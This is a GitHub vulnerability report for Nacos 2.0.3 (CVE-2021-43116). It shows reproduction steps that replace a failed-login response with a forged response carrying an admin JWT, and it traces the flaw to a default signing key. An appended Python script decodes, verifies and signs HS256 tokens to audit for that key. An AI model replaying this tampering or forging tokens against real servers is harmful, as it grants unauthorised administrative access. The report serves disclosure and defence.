CVE-2021-43116: Found a login background vulnerability · Issue #7182 · alibaba/nacos
An Access Control vulnerability exists in Nacos 2.0.3 in the access prompt page; enter username and password, click on login to capture packets and then change the returned package, which lets a malicious user login.
Steps to reproduce the problem:
1. Download the latest version of Nacos from https://github.com/alibaba/nacos/
2. Follow the installation steps.
3. After the installation succeeds, open the default login page.
4. Enter any account and password, then click login; the login fails.
5. Capture the traffic at login time and intercept the returned packet. The intercepted return packet is:
6. Replace the returned packet and let it pass. The replacement packet is:
HTTP/1.1 200
Server: nginx/1.19.6
Date: Sun, 11 Apr 2021 01:48:17 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: http://47.93.46.78:9090
Access-Control-Allow-Credentials: true
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA
Content-Length: 162
{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}
7. At this point you can see that you have successfully entered the admin console.
The cause of this problem is that Nacos uses the default JWT key.
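As an added example (not from the report or the Nacos project), the script below decodes the token in the response above, cross-checks its `exp` claim against the `Date` header and `tokenTtl`, and audits whether a token validates under a secret you supply, which is how an operator confirms a deployment is still on a shared or default key. The secrets used in the test fixture are constructed placeholders; the default Nacos key itself is not part of this page.

```python
import base64
import hashlib
import hmac
import json
from email.utils import parsedate_to_datetime

# Values copied from the response packet in the report above.
TOKEN = ("eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30."
         "nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA")
DATE_HEADER = "Sun, 11 Apr 2021 01:48:17 GMT"
TOKEN_TTL = 18000


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_jwt(token: str) -> tuple[dict, dict]:
    """Return (header, claims). Decoding is not verification: the claims
    (here sub=nacos, and globalAdmin in the body) are only trustworthy once
    hs256_signature_valid() has passed with a secret nobody else holds."""
    header_b64, payload_b64, _ = token.split(".")
    return json.loads(_b64url_decode(header_b64)), json.loads(_b64url_decode(payload_b64))


def hs256_signature_valid(token: str, secret: bytes) -> bool:
    """True if the HS256 signature was produced with `secret`. Audit use: a
    token issued by your deployment must NOT validate under the secret from
    the stock configuration; if it does, anyone who has read that
    configuration can produce tokens the server accepts (the CVE's root cause)."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig_b64))


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Build an HS256 token (what any JWT library's encode() does); used here
    only to create a fixture so the verifier above can be exercised."""
    header_b64 = _b64url_encode(b'{"alg":"HS256"}')
    payload_b64 = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return f"{header_b64}.{payload_b64}.{_b64url_encode(sig)}"


def token_lifetime_seconds(token: str, date_header: str) -> int:
    """exp claim minus the HTTP Date header. A token the server minted at
    response time should give exactly the tokenTtl from the JSON body."""
    _, claims = decode_jwt(token)
    issued_at = int(parsedate_to_datetime(date_header).timestamp())
    return claims["exp"] - issued_at
```

For the packet in the report, the lifetime check yields 18000 seconds, matching the `tokenTtl` field, so the token was minted at the time of that response.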